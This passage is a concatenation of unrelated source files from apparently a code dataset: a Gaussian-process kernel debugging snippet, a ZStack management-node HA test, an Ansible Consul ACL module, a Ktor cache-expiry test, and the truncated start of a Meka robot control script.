    # Load the suspicious kernel
    sk = fk.repr_string_to_kernel('ScoredKernel(k_opt=ProductKernel([ MaskKernel(ndim=8, active_dimension=0, base_kernel=CubicKernel(offset=1.757755, output_variance=7.084045)), MaskKernel(ndim=8, active_dimension=7, base_kernel=SqExpPeriodicKernel(lengthscale=-2.701080, period=-0.380918, output_variance=-0.071214)) ]), nll=6348.096611, laplace_nle=-184450132.068237, bic_nle=12720.630212, noise=[-1.77276072])')
    # Create some code to evaluate it
    if X.ndim == 1: X = X[:, nax]
    if y.ndim == 1: y = y[:, nax]
    ndata = y.shape[0]
    # Create data file
    data_file = cblparallel.create_temp_file('.mat')
    scipy.io.savemat(data_file, {'X': X, 'y': y}) # Save regression data
    # Move to fear
    cblparallel.copy_to_remote(data_file)
    scripts = [gpml.OPTIMIZE_KERNEL_CODE % {'datafile': data_file.split('/')[-1],
                                            'writefile': '%(output_file)s', # N.B. cblparallel manages output files
                                            'gpml_path': cblparallel.gpml_path(local_computation=False),
                                            'kernel_family': sk.k_opt.gpml_kernel_expression(),
                                            'kernel_params': '[ %s ]' % ' '.join(str(p) for p in sk.k_opt.param_vector()),
                                            'noise': str(sk.noise),
                                            'iters': str(300)}]
    #### Need to be careful with % signs
    #### For the moment, cblparallel expects no single % signs - FIXME
    scripts[0] = re.sub('% ', '%% ', scripts[0])
    # Test
    # NOTE(review): this substitution replaces the text with itself — it is
    # a no-op left over from experimentation.
    scripts[0] = re.sub('delta = 1e-6', 'delta = 1e-6', scripts[0])
    #scripts[0] = re.sub('hyp.lik = [-1.77276072]', 'hyp.lik = [-0.77276072]', scripts[0])
    output_file = cblparallel.run_batch_on_fear(scripts, language='matlab', max_jobs=600)[0]
    # Read in results
    output = gpml.read_outputs(output_file)
    result = ScoredKernel.from_matlab_output(output, sk.k_opt.family(), ndata)
    print result
    print output.hessian
    os.remove(output_file)
    # Remove temporary data file (perhaps on the cluster server)
    cblparallel.remove_temp_file(data_file, local_computation=False)
def debug_descriptions():
    '''Print the English-language description of Carl's Mauna kernel.'''
    ck = fk.Carls_Mauna_kernel()
    print ck.english()
|
unknown
|
codeparrot/codeparrot-clean
| ||
'''
Integration Test for creating KVM VM in MN HA mode after destroying MN VM.
@author: Mirabel
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.node_operations as node_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import test_stub
import time
import os
vm = None
mn_host = None
def test():
    """Destroy the management-node (MN) VM, wait for HA to restart it on
    exactly one host, then verify the recovered management node can create,
    check and destroy a basic VM.
    """
    global vm
    global mn_host
    # Locate the host(s) currently running the MN VM; there must be exactly one.
    mn_host = test_stub.get_host_by_mn_vm(test_lib.all_scenario_config, test_lib.scenario_file)
    if len(mn_host) != 1:
        test_util.test_fail('MN VM is running on %d host(s)' % len(mn_host))
    test_util.test_logger("destroy mn vm on host [%s]" % mn_host[0].ip_)
    test_stub.destroy_mn_vm(mn_host[0], test_lib.all_scenario_config)
    new_mn_host = test_stub.get_host_by_mn_vm(test_lib.all_scenario_config, test_lib.scenario_file)
    if len(new_mn_host) == 0:
        test_util.test_logger("mn vm was destroyed successfully")
    else:
        test_util.test_fail("mn vm was not destroyed successfully")
    test_util.test_logger("wait for 20 seconds to see if management node VM starts on one host")
    time.sleep(20)
    # The consul leader should have elected a host to restart the MN VM on.
    new_mn_host_ip = test_stub.get_host_by_consul_leader(test_lib.all_scenario_config, test_lib.scenario_file)
    if new_mn_host_ip == "":# or new_mn_host_ip != mn_host[0].ip_:
        test_util.test_fail("management node VM not run correctly on [%s] after its former host [%s] down for 20s" % (new_mn_host_ip, mn_host[0].ip_))
    # Poll up to 60 * 5s = 5 minutes for the MN VM to come back on exactly one host.
    count = 60
    while count > 0:
        new_mn_host = test_stub.get_host_by_mn_vm(test_lib.all_scenario_config, test_lib.scenario_file)
        if len(new_mn_host) == 1:
            test_util.test_logger("management node VM run after its former host down for 30s")
            break
        elif len(new_mn_host) > 1:
            test_util.test_fail("management node VM runs on more than one host after its former host down")
        time.sleep(5)
        count -= 1
    if len(new_mn_host) == 0:
        test_util.test_fail("management node VM does not run after its former host down for 30s")
    elif len(new_mn_host) > 1:
        test_util.test_fail("management node VM runs on more than one host after its former host down")
    #node_ops.wait_for_management_server_start(300)
    test_stub.wrapper_of_wait_for_management_server_start(600)
    # Confirm infrastructure connectivity before exercising VM operations.
    test_stub.ensure_hosts_connected()
    test_stub.ensure_pss_connected()
    test_stub.ensure_bss_connected()
    test_stub.return_pass_ahead_if_3sites("TEST PASS")
    # Sanity check: the recovered management node can serve a VM lifecycle.
    vm = test_stub.create_basic_vm()
    vm.check()
    vm.destroy()
    test_util.test_pass('Create VM Test Success')
# Called regardless of the test result.
def env_recover():
    """Always-run teardown: block until MN HA is fully ready again."""
    test_stub.wait_for_mn_ha_ready(test_lib.all_scenario_config, test_lib.scenario_file)
# Called only when test() raises: best-effort teardown of the created VM.
def error_cleanup():
    """Destroy the test VM if it was created; swallow any teardown error."""
    global vm
    if not vm:
        return
    try:
        vm.destroy()
    except:
        pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
#
# (c) 2015, Steve Gargan <steve.gargan@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: consul_acl
short_description: Manipulate Consul ACL keys and rules
description:
- Allows the addition, modification and deletion of ACL keys and associated
rules in a consul cluster via the agent. For more details on using and
configuring ACLs, see https://www.consul.io/docs/guides/acl.html.
version_added: "2.0"
author:
- Steve Gargan (@sgargan)
- Colin Nolan (@colin-nolan)
options:
mgmt_token:
description:
- a management token is required to manipulate the acl lists
state:
description:
- whether the ACL pair should be present or absent
required: false
choices: ['present', 'absent']
default: present
token_type:
description:
- the type of token that should be created, either management or client
choices: ['client', 'management']
default: client
name:
description:
- the name that should be associated with the acl key, this is opaque
to Consul
required: false
token:
description:
- the token key indentifying an ACL rule set. If generated by consul
this will be a UUID
required: false
rules:
description:
- a list of the rules that should be associated with a given token
required: false
host:
description:
- host of the consul agent defaults to localhost
required: false
default: localhost
port:
description:
- the port on which the consul agent is running
required: false
default: 8500
scheme:
description:
- the protocol scheme on which the consul agent is running
required: false
default: http
version_added: "2.1"
validate_certs:
description:
- whether to verify the tls certificate of the consul agent
required: false
default: True
version_added: "2.1"
requirements:
- "python >= 2.6"
- python-consul
- pyhcl
- requests
"""
EXAMPLES = """
- name: create an ACL with rules
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
name: Foo access
rules:
- key: "foo"
policy: read
- key: "private/foo"
policy: deny
- name: create an ACL with a specific token
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
name: Foo access
token: my-token
rules:
- key: "foo"
policy: read
- name: update the rules associated to an ACL token
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
name: Foo access
token: some_client_token
rules:
- event: "bbq"
policy: write
- key: "foo"
policy: read
- key: "private"
policy: deny
- keyring: write
- node: "hgs4"
policy: write
- operator: read
- query: ""
policy: write
- service: "consul"
policy: write
- session: "standup"
policy: write
- name: remove a token
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
token: 172bd5c8-9fe9-11e4-b1b0-3c15c2c9fd5e
state: absent
"""
RETURN = """
token:
description: the token associated to the ACL (the ACL's ID)
returned: success
type: string
sample: a2ec332f-04cf-6fba-e8b8-acf62444d3da
rules:
description: the HCL JSON representation of the rules associated to the ACL, in the format described in the
Consul documentation (https://www.consul.io/docs/guides/acl.html#rule-specification).
returned: I(status) == "present"
type: string
sample: {
"key": {
"foo": {
"policy": "write"
},
"bar": {
"policy": "deny"
}
}
}
operation:
description: the operation performed on the ACL
returned: changed
type: string
sample: update
"""
try:
import consul
python_consul_installed = True
except ImportError:
python_consul_installed = False
try:
import hcl
pyhcl_installed = True
except ImportError:
pyhcl_installed = False
try:
from requests.exceptions import ConnectionError
has_requests = True
except ImportError:
has_requests = False
from collections import defaultdict
from ansible.module_utils.basic import to_text, AnsibleModule
RULE_SCOPES = ["agent", "event", "key", "keyring", "node", "operator", "query", "service", "session"]
MANAGEMENT_PARAMETER_NAME = "mgmt_token"
HOST_PARAMETER_NAME = "host"
SCHEME_PARAMETER_NAME = "scheme"
VALIDATE_CERTS_PARAMETER_NAME = "validate_certs"
NAME_PARAMETER_NAME = "name"
PORT_PARAMETER_NAME = "port"
RULES_PARAMETER_NAME = "rules"
STATE_PARAMETER_NAME = "state"
TOKEN_PARAMETER_NAME = "token"
TOKEN_TYPE_PARAMETER_NAME = "token_type"
PRESENT_STATE_VALUE = "present"
ABSENT_STATE_VALUE = "absent"
CLIENT_TOKEN_TYPE_VALUE = "client"
MANAGEMENT_TOKEN_TYPE_VALUE = "management"
REMOVE_OPERATION = "remove"
UPDATE_OPERATION = "update"
CREATE_OPERATION = "create"
_POLICY_JSON_PROPERTY = "policy"
_RULES_JSON_PROPERTY = "Rules"
_TOKEN_JSON_PROPERTY = "ID"
_TOKEN_TYPE_JSON_PROPERTY = "Type"
_NAME_JSON_PROPERTY = "Name"
_POLICY_YML_PROPERTY = "policy"
_POLICY_HCL_PROPERTY = "policy"
_ARGUMENT_SPEC = {
MANAGEMENT_PARAMETER_NAME: dict(required=True, no_log=True),
HOST_PARAMETER_NAME: dict(default='localhost'),
SCHEME_PARAMETER_NAME: dict(required=False, default='http'),
VALIDATE_CERTS_PARAMETER_NAME: dict(required=False, type='bool', default=True),
NAME_PARAMETER_NAME: dict(required=False),
PORT_PARAMETER_NAME: dict(default=8500, type='int'),
RULES_PARAMETER_NAME: dict(default=None, required=False, type='list'),
STATE_PARAMETER_NAME: dict(default=PRESENT_STATE_VALUE, choices=[PRESENT_STATE_VALUE, ABSENT_STATE_VALUE]),
TOKEN_PARAMETER_NAME: dict(required=False),
TOKEN_TYPE_PARAMETER_NAME: dict(required=False, choices=[CLIENT_TOKEN_TYPE_VALUE, MANAGEMENT_TOKEN_TYPE_VALUE],
default=CLIENT_TOKEN_TYPE_VALUE)
}
def set_acl(consul_client, configuration):
    """
    Sets an ACL based on the given configuration.
    Updates an existing ACL in-place when it can be matched (by token, or by
    name when no token was supplied); otherwise creates a new ACL.
    :param consul_client: the consul client
    :param configuration: the run configuration
    :return: the output of setting the ACL
    """
    acls_as_json = decode_acls_as_json(consul_client.acl.list())
    existing_acls_mapped_by_name = dict((acl.name, acl) for acl in acls_as_json if acl.name is not None)
    existing_acls_mapped_by_token = dict((acl.token, acl) for acl in acls_as_json)
    # Every ACL returned by Consul must carry a token (its ID).
    if None in existing_acls_mapped_by_token:
        raise AssertionError("expecting ACL list to be associated to a token: %s" %
                             existing_acls_mapped_by_token[None])
    if configuration.token is None and configuration.name and configuration.name in existing_acls_mapped_by_name:
        # No token but name given so can get token from name
        configuration.token = existing_acls_mapped_by_name[configuration.name].token
    if configuration.token and configuration.token in existing_acls_mapped_by_token:
        return update_acl(consul_client, configuration)
    else:
        # Creating: must not collide with an existing token or name.
        if configuration.token in existing_acls_mapped_by_token:
            raise AssertionError()
        if configuration.name in existing_acls_mapped_by_name:
            raise AssertionError()
        return create_acl(consul_client, configuration)
def update_acl(consul_client, configuration):
    """
    Updates an ACL.
    :param consul_client: the consul client
    :param configuration: the run configuration
    :return: the output of the update
    """
    existing_acl = load_acl_with_token(consul_client, configuration.token)
    # Only touch Consul when the rule set actually differs.
    changed = existing_acl.rules != configuration.rules
    if changed:
        # Keep the existing name unless the caller supplied a new one.
        name = configuration.name if configuration.name is not None else existing_acl.name
        rules_as_hcl = encode_rules_as_hcl_string(configuration.rules)
        updated_token = consul_client.acl.update(
            configuration.token, name=name, type=configuration.token_type, rules=rules_as_hcl)
        # An update must never change the ACL's ID.
        if updated_token != configuration.token:
            raise AssertionError()
    return Output(changed=changed, token=configuration.token, rules=configuration.rules, operation=UPDATE_OPERATION)
def create_acl(consul_client, configuration):
    """
    Creates a new ACL from the run configuration.
    :param consul_client: the consul client
    :param configuration: the run configuration
    :return: the output of the creation
    """
    rules = configuration.rules
    # Consul expects None, not an empty string, when there are no rules.
    hcl_rules = None
    if len(rules) > 0:
        hcl_rules = encode_rules_as_hcl_string(rules)
    token = consul_client.acl.create(
        name=configuration.name, type=configuration.token_type, rules=hcl_rules, acl_id=configuration.token)
    return Output(changed=True, token=token, rules=rules, operation=CREATE_OPERATION)
def remove_acl(consul, configuration):
    """
    Removes an ACL if it exists.
    :param consul: the consul client
    :param configuration: the run configuration
    :return: the output of the removal
    """
    token = configuration.token
    # Only report "changed" (and call destroy) when the ACL actually exists.
    exists = consul.acl.info(token) is not None
    if exists:
        consul.acl.destroy(token)
    return Output(changed=exists, token=token, operation=REMOVE_OPERATION)
def load_acl_with_token(consul, token):
    """
    Loads the ACL identified by the given token (token == ACL ID, not name).
    :param consul: the consul client
    :param token: the ACL "token"/ID
    :return: the ACL domain model for the token
    :exception ConsulACLNotFoundException: if no ACL exists for the token
    """
    info = consul.acl.info(token)
    if info is None:
        raise ConsulACLNotFoundException(token)
    return decode_acl_as_json(info)
def encode_rules_as_hcl_string(rules):
    """
    Converts the given rules into the equivalent HCL (string) representation.
    :param rules: the rules
    :return: the equivalent HCL (string) representation of the rules. Will be None if there is no rules (see internal
    note for justification)
    """
    if len(rules) == 0:
        # Note: empty string is not valid HCL according to `hcl.load` however, the ACL `Rule` property will be an empty
        # string if there is no rules...
        return None
    # str.join instead of quadratic += concatenation in a loop.
    return "".join(encode_rule_as_hcl_string(rule) for rule in rules)
def encode_rule_as_hcl_string(rule):
    """
    Converts a single rule into its HCL (string) representation.
    :param rule: the rule
    :return: the equivalent HCL (string) representation of the rule
    """
    if rule.pattern is None:
        # Pattern-less scopes (e.g. "operator") are a bare assignment.
        return '%s = "%s"\n' % (rule.scope, rule.policy)
    return '%s "%s" {\n %s = "%s"\n}\n' % (rule.scope, rule.pattern, _POLICY_HCL_PROPERTY, rule.policy)
def decode_rules_as_hcl_string(rules_as_hcl):
    """
    Converts the given HCL (string) representation of rules into a list of rule domain models.
    :param rules_as_hcl: the HCL (string) representation of a collection of rules
    :return: the equivalent domain model to the given rules
    """
    # `hcl.loads` requires text, not bytes.
    rules_as_hcl = to_text(rules_as_hcl)
    rules_as_json = hcl.loads(rules_as_hcl)
    return decode_rules_as_json(rules_as_json)
def decode_rules_as_json(rules_as_json):
    """
    Converts the given JSON representation of rules into a list of rule domain models.
    :param rules_as_json: the JSON representation of a collection of rules
    :return: the equivalent domain model to the given rules
    """
    collection = RuleCollection()
    for scope, value in rules_as_json.items():
        if isinstance(value, dict):
            # The scope maps patterns to {policy: ...} objects.
            for pattern, policy in value.items():
                collection.add(Rule(scope, policy[_POLICY_JSON_PROPERTY], pattern))
        else:
            # Pattern-less scope: the value is the policy itself.
            collection.add(Rule(scope, value))
    return collection
def encode_rules_as_json(rules):
    """
    Converts the given rules into the equivalent JSON representation according to the documentation:
    https://www.consul.io/docs/guides/acl.html#rule-specification.
    :param rules: the rules
    :return: JSON representation of the given rules
    """
    encoded = defaultdict(dict)
    for rule in rules:
        if rule.pattern is None:
            # Pattern-less scopes hold the policy directly; each may appear at most once.
            if rule.scope in encoded:
                raise AssertionError()
            encoded[rule.scope] = rule.policy
        else:
            if rule.pattern in encoded[rule.scope]:
                raise AssertionError()
            encoded[rule.scope][rule.pattern] = {
                _POLICY_JSON_PROPERTY: rule.policy
            }
    return encoded
def decode_rules_as_yml(rules_as_yml):
    """
    Converts the given YAML representation of rules into a list of rule domain models.
    :param rules_as_yml: the YAML representation of a collection of rules
    :return: the equivalent domain model to the given rules
    :raises ValueError: if a rule has no scope value, no recognised scope, or
        duplicates an existing rule (via RuleCollection.add)
    """
    rules = RuleCollection()
    if rules_as_yml:
        for rule_as_yml in rules_as_yml:
            rule_added = False
            for scope in RULE_SCOPES:
                if scope in rule_as_yml:
                    if rule_as_yml[scope] is None:
                        raise ValueError("Rule for '%s' does not have a value associated to the scope" % scope)
                    # With an explicit "policy" key, the scope's value is the pattern;
                    # otherwise the scope's value is itself the policy (no pattern).
                    policy = rule_as_yml[_POLICY_YML_PROPERTY] if _POLICY_YML_PROPERTY in rule_as_yml \
                        else rule_as_yml[scope]
                    pattern = rule_as_yml[scope] if _POLICY_YML_PROPERTY in rule_as_yml else None
                    rules.add(Rule(scope, policy, pattern))
                    rule_added = True
                    break
            if not rule_added:
                raise ValueError("A rule requires one of %s and a policy." % ('/'.join(RULE_SCOPES)))
    return rules
def decode_acl_as_json(acl_as_json):
    """
    Converts the given JSON representation of an ACL into the equivalent domain model.
    :param acl_as_json: the JSON representation of an ACL
    :return: the equivalent domain model to the given ACL
    """
    rules_as_hcl = acl_as_json[_RULES_JSON_PROPERTY]
    # An ACL with no rules carries an empty/whitespace `Rules` string, which is
    # not valid HCL -- map it to an empty collection instead of parsing.
    rules = decode_rules_as_hcl_string(acl_as_json[_RULES_JSON_PROPERTY]) if rules_as_hcl.strip() != "" \
        else RuleCollection()
    return ACL(
        rules=rules,
        token_type=acl_as_json[_TOKEN_TYPE_JSON_PROPERTY],
        token=acl_as_json[_TOKEN_JSON_PROPERTY],
        name=acl_as_json[_NAME_JSON_PROPERTY]
    )
def decode_acls_as_json(acls_as_json):
    """
    Converts the given JSON representation of ACLs into a list of ACL domain models.
    :param acls_as_json: the JSON representation of a collection of ACLs
    :return: list of equivalent domain models for the given ACLs (order not guaranteed to be the same)
    """
    decoded = []
    for acl_as_json in acls_as_json:
        decoded.append(decode_acl_as_json(acl_as_json))
    return decoded
class ConsulACLNotFoundException(Exception):
    """
    Exception raised if an ACL with the given token is not found.
    """
class Configuration:
    """
    Run configuration for this module, mirroring the module parameters.
    """
    def __init__(self, management_token=None, host=None, scheme=None, validate_certs=None, name=None, port=None,
                 rules=None, state=None, token=None, token_type=None):
        self.management_token = management_token  # type: str
        self.host = host  # type: str
        self.scheme = scheme  # type: str
        self.validate_certs = validate_certs  # type: bool
        self.name = name  # type: str
        self.port = port  # type: int
        self.rules = rules  # type: RuleCollection
        self.state = state  # type: str
        self.token = token  # type: str
        self.token_type = token_type  # type: str
class Output:
    """
    Result of an action performed by this module.
    """
    def __init__(self, changed=None, token=None, rules=None, operation=None):
        self.changed = changed  # type: bool
        self.token = token  # type: str
        self.rules = rules  # type: RuleCollection
        self.operation = operation  # type: str
class ACL:
    """
    Consul ACL domain model. See: https://www.consul.io/docs/guides/acl.html.
    """
    def __init__(self, rules, token_type, token, name):
        self.rules = rules
        self.token_type = token_type
        self.token = token
        self.name = name

    def __eq__(self, other):
        # Preserve the original short-circuit semantics: a falsy `other`
        # is returned as-is (falsy), otherwise compare all fields.
        return other \
            and isinstance(other, self.__class__) \
            and (self.rules, self.token_type, self.token, self.name) \
            == (other.rules, other.token_type, other.token, other.name)

    def __hash__(self):
        result = hash(self.rules)
        for part in (self.token_type, self.token, self.name):
            result ^= hash(part)
        return result
class Rule:
    """
    A single ACL rule. See: https://www.consul.io/docs/guides/acl.html#acl-rules-and-scope.
    """
    def __init__(self, scope, policy, pattern=None):
        self.scope = scope
        self.policy = policy
        self.pattern = pattern

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return (self.scope, self.policy, self.pattern) \
            == (other.scope, other.policy, other.pattern)

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return (hash(self.scope) ^ hash(self.policy)) ^ hash(self.pattern)

    def __str__(self):
        return encode_rule_as_hcl_string(self)
class RuleCollection:
    """
    Collection of ACL rules keyed by scope and pattern; part of a Consul ACL.
    """
    def __init__(self):
        # scope -> {pattern -> Rule}; every known scope starts empty.
        self._rules = dict((scope, {}) for scope in RULE_SCOPES)

    def __iter__(self):
        collected = []
        for rules_by_pattern in self._rules.values():
            collected.extend(rules_by_pattern.values())
        return iter(collected)

    def __len__(self):
        return sum(len(self._rules[scope]) for scope in RULE_SCOPES)

    def __eq__(self, other):
        return isinstance(other, self.__class__) \
            and set(self) == set(other)

    def __ne__(self, other):
        return not self.__eq__(other)

    def __str__(self):
        return encode_rules_as_hcl_string(self)

    def add(self, rule):
        """
        Adds the given rule to this collection.
        :param rule: model of a rule
        :raises ValueError: raised if there already exists a rule for a given scope and pattern
        """
        if rule.pattern in self._rules[rule.scope]:
            pattern_info = " and pattern '%s'" % rule.pattern if rule.pattern is not None else ""
            raise ValueError("Duplicate rule for scope '%s'%s" % (rule.scope, pattern_info))
        self._rules[rule.scope][rule.pattern] = rule
def get_consul_client(configuration):
    """
    Gets a Consul client for the given configuration.
    Does not check if the Consul client can connect.
    :param configuration: the run configuration
    :return: Consul client
    """
    # Prefer the management token; fall back to the ACL token only if unset.
    token = configuration.management_token
    if token is None:
        token = configuration.token
    if token is None:
        raise AssertionError("Expecting the management token to always be set")
    return consul.Consul(host=configuration.host, port=configuration.port, scheme=configuration.scheme,
                         verify=configuration.validate_certs, token=token)
def check_dependencies():
    """
    Checks that the required third-party dependencies were successfully imported.
    :exception ImportError: if any required dependency is missing
    """
    requirements = [
        (python_consul_installed, "python-consul required for this module. "
                                  "See: http://python-consul.readthedocs.org/en/latest/#installation"),
        (pyhcl_installed, "pyhcl required for this module. "
                          "See: https://pypi.python.org/pypi/pyhcl"),
        (has_requests, "requests required for this module. See https://pypi.python.org/pypi/requests"),
    ]
    for installed, message in requirements:
        if not installed:
            raise ImportError(message)
def main():
    """
    Module entry point: parse parameters, run the requested ACL operation and
    report the result via the Ansible module exit/fail API.
    """
    module = AnsibleModule(_ARGUMENT_SPEC, supports_check_mode=False)
    try:
        check_dependencies()
    except ImportError as e:
        module.fail_json(msg=str(e))
    configuration = Configuration(
        management_token=module.params.get(MANAGEMENT_PARAMETER_NAME),
        host=module.params.get(HOST_PARAMETER_NAME),
        scheme=module.params.get(SCHEME_PARAMETER_NAME),
        validate_certs=module.params.get(VALIDATE_CERTS_PARAMETER_NAME),
        name=module.params.get(NAME_PARAMETER_NAME),
        port=module.params.get(PORT_PARAMETER_NAME),
        rules=decode_rules_as_yml(module.params.get(RULES_PARAMETER_NAME)),
        state=module.params.get(STATE_PARAMETER_NAME),
        token=module.params.get(TOKEN_PARAMETER_NAME),
        token_type=module.params.get(TOKEN_TYPE_PARAMETER_NAME)
    )
    consul_client = get_consul_client(configuration)
    try:
        if configuration.state == PRESENT_STATE_VALUE:
            output = set_acl(consul_client, configuration)
        else:
            output = remove_acl(consul_client, configuration)
    except ConnectionError as e:
        module.fail_json(msg='Could not connect to consul agent at %s:%s, error was %s' % (
            configuration.host, configuration.port, str(e)))
        # fail_json normally exits; re-raise defensively in case it returns.
        raise
    return_values = dict(changed=output.changed, token=output.token, operation=output.operation)
    # Only present-state operations carry rules to report.
    if output.rules is not None:
        return_values["rules"] = encode_rules_as_json(output.rules)
    module.exit_json(**return_values)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2014-2024 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.client.plugins.cache.tests
import io.ktor.client.call.*
import io.ktor.client.plugins.cache.*
import io.ktor.client.statement.*
import io.ktor.client.utils.*
import io.ktor.http.*
import io.ktor.util.date.*
import io.ktor.utils.io.*
import kotlin.coroutines.*
import kotlin.test.*
/**
 * Tests for `HttpResponse.cacheExpires`: Expires-header parsing (including
 * invalid values falling back to a default) and Cache-Control
 * max-age / s-maxage handling for private vs. shared caches.
 */
class CacheExpiresTest {
    @Test
    fun testValidExpirationDate() {
        val dateText = "Tue, 27 Oct 2020 15:21:07 GMT"
        val parsed = dateText.fromHttpToGmtDate()
        val response = response {
            append(HttpHeaders.Expires, dateText)
        }
        val result = response.cacheExpires(false)
        assertEquals(parsed, result)
    }

    // Unparseable Expires values must use the supplied fallback producer.
    @Test
    fun testInvalidExpirationDate() {
        val dateText = "A1231242323532452345"
        val expected = GMTDate.START
        val response = response {
            append(HttpHeaders.Expires, dateText)
        }
        val result = response.cacheExpires(false) { expected }
        assertEquals(expected, result)
    }

    @Test
    fun testInvalidExpirationDateZero() {
        val dateText = "0"
        val expected = GMTDate.START
        val response = response {
            append(HttpHeaders.Expires, dateText)
        }
        val result = response.cacheExpires(false) { expected }
        assertEquals(expected, result)
    }

    @Test
    fun testInvalidExpirationDateEmpty() {
        val dateText = ""
        val expected = GMTDate.START
        val response = response {
            append(HttpHeaders.Expires, dateText)
        }
        val result = response.cacheExpires(false) { expected }
        assertEquals(expected, result)
    }

    @Test
    fun testInvalidExpirationDateBlank() {
        val dateText = " "
        val expected = GMTDate.START
        val response = response {
            append(HttpHeaders.Expires, dateText)
        }
        val result = response.cacheExpires(false) { expected }
        assertEquals(expected, result)
    }

    // A private (non-shared) cache uses max-age and ignores s-maxage.
    @Test
    fun testMaxAgePrivate() {
        val now = GMTDate(10)
        val response = response(now) {
            append(HttpHeaders.CacheControl, "s-maxage=5, max-age=15")
        }
        val result = response.cacheExpires(false)
        assertEquals(GMTDate(now.timestamp + 15 * 1000), result)
    }

    // A shared cache prefers s-maxage over max-age when both are present.
    @Test
    fun testMaxAgeShared() {
        val now = GMTDate(10)
        val response = response(now) {
            append(HttpHeaders.CacheControl, "s-maxage=5, max-age=15")
        }
        val result = response.cacheExpires(true)
        assertEquals(GMTDate(now.timestamp + 5 * 1000), result)
    }

    @Test
    fun testMaxAgeSharedNoSMaxAge() {
        val now = GMTDate(10)
        val response = response(now) {
            append(HttpHeaders.CacheControl, "max-age=15")
        }
        val result = response.cacheExpires(true)
        assertEquals(GMTDate(now.timestamp + 15 * 1000), result)
    }

    // Builds a minimal response exposing only headers and the request time.
    private fun response(requestTime: GMTDate = GMTDate(), builder: HeadersBuilder.() -> Unit): HttpResponse {
        return Response(buildHeaders(builder), requestTime)
    }

    // Stub response: everything except headers/requestTime is unused by these tests.
    private class Response(
        override val headers: Headers,
        override val requestTime: GMTDate = GMTDate()
    ) : HttpResponse() {
        override val call: HttpClientCall get() = error("Shouldn't be used")
        override val status: HttpStatusCode
            get() = error("Shouldn't be used")
        override val version: HttpProtocolVersion
            get() = error("Shouldn't be used")
        override val responseTime: GMTDate
            get() = error("Shouldn't be used")
        @OptIn(InternalAPI::class)
        override val rawContent: ByteReadChannel
            get() = error("Shouldn't be used")
        override val coroutineContext: CoroutineContext
            get() = error("Shouldn't be used")
    }
}
|
kotlin
|
github
|
https://github.com/ktorio/ktor
|
ktor-client/ktor-client-core/common/test/CacheExpiresTest.kt
|
#! /usr/bin/python
#Copyright 2010, Meka Robotics
#All rights reserved.
#http://mekabot.com
#Redistribution and use in source and binary forms, with or without
#modification, are permitted.
#THIS SOFTWARE IS PROVIDED BY THE Copyright HOLDERS AND CONTRIBUTORS
#"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
#FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
#Copyright OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
#INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES INCLUDING,
#BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
#CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
#LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
#ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
import time
import m3.rt_proxy as m3p
import m3.toolbox as m3t
import m3.component_factory as m3f
import os
import sys
import yaml
import m3.trajectory as m3jt
import numpy as nu
import m3.gui as m3g
import m3.toolbox as m3t
import m3.viz as m3v
# #####################################################
def load_vias():
    """Prompt the user to pick a via file by index and return its parsed YAML
    contents, or None when no file exists or the index is out of range."""
    via_files=m3t.get_via_files()
    via_names=m3t.get_via_names()
    if len(via_files)==0:
        print 'No via files available'
        return
    print 'Enter file IDX'
    print '-----------------------'
    for i in range(len(via_names)):
        print i,' : ',via_names[i]
    idx=m3t.get_int(0)
    if idx>=0 and idx<len(via_names):
        # NOTE(review): file handle is never closed (Python 2 `file` builtin).
        f=file(via_files[idx],'r')
        d=yaml.safe_load(f.read())
        return d
    return None
# ######################################################
# Interactive setup: optionally enable RVIZ visualisation, connect to the
# M3 realtime proxy, power on the robot and let the user pick chains.
print 'Enable RVIZ? [n]'
pub=None
rviz = m3t.get_yes_no('n')
# ######################################################
proxy = m3p.M3RtProxy()
proxy.start()
bot_name=m3t.get_robot_name()
if bot_name == "":
    print 'Error: no robot components found:', bot_name
    quit  # NOTE(review): bare name, not quit() -- this does not actually exit
bot=m3f.create_component(bot_name)
if rviz == True:
    viz = m3v.M3Viz(proxy, bot)
proxy.subscribe_status(bot)
proxy.publish_command(bot)
proxy.make_operational_all()
bot.set_motor_power_on()
proxy.step()
if rviz == True:
    viz.step()
print 'Select chains:'
chains = m3t.user_select_components_interactive(bot.get_available_chains(),single=False)
# ######################################################
#Hardcode defaults for now...should move to config file
# Per-chain default joint stiffness (0..1 scale, one entry per joint).
stiffness={
    'right_arm':[
        0.5, #J0
        0.5, #J1
        0.5, #J2
        0.5, #J3
        0.5, #J4
        0.5, #J5
        0.5],#J6
    'left_arm':[
        0.5, #J0
        0.5, #J1
        0.5, #J2
        0.5, #J3
        0.5, #J4
        0.5, #J5
        0.5],#J6
    'torso':[
